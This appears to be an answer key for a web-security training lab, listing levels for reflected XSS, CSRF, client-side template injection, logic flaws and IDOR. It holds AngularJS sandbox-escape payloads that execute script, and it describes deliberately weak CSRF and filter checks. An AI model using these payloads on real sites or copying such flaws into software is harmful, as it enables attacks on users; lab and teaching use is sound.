RXSS
---------
1: No filters 
2: filtering alert
3: Filtering alert, confirm and script

CSRF
---------
1: No token where it should be
2: Adds a token but never checks it 
3: Only checks if the token is present but not correct
4: Only checks the length of the token

CSTI:
---------
1: {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
2: {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
3: {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

LOGIC:
---------
1: The milage is calulated client-side, it should never be
2: You can enter a discount of more than 100%
3: The amount of votes is controlled client-side

IDOR:
---------
1: You need to add the parameter "?user_id=2" to the URL
2: You need to add the parameter "?post_id=2" to the URL